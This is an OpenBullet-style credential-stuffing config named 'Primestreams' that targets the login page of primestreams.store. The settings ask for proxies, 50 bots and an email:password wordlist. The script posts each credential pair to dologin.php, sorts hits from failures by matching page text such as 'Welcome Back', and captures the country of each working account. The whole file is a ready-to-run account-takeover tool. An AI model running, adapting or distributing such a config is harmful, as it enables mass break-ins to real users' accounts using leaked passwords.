[SETTINGS]
{
  "Name": "Primestreams",
  "SuggestedBots": 50,
  "MaxCPM": 0,
  "LastModified": "2019-09-30T22:27:38.784589+01:00",
  "AdditionalInfo": "",
  "Author": "c1sav",
  "Version": "1.3.1 [Anomaly]",
  "LoliSave": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "EncodeData": false,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "MailPass",
  "DataRules": [],
  "CustomInputs": [],
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}

[SCRIPT]
REQUEST GET "https://primestreams.store/dologin.php" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

#Token PARSE "<SOURCE>" LR "csrfToken = '" "'," -> VAR "Token" 

REQUEST POST "https://primestreams.store/dologin.php" 
  CONTENT "token=<TOKEN>&username=<USER>&password=<PASS>" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 
  HEADER "Origin: https://primestreams.store" 
  HEADER "Referer: https://primestreams.store/clientarea.php" 

KEYCHECK 
  KEYCHAIN Success OR 
    KEY "Welcome Back" 
    KEY "Your Info" 
    KEY "Your Active Products/Services" 
  KEYCHAIN Failure OR 
    KEY "Login Details Incorrect. Please try again." 
    KEY "<SOURCE>" DoesNotContain "Your Active Products/Services" 
    KEY "<SOURCE>" DoesNotContain "Welcome Back" 
    KEY "<SOURCE>" DoesNotContain "Your Info" 

PARSE "<SOURCE>" LR "\"languageChooser\">" "<b " -> CAP "Country" 

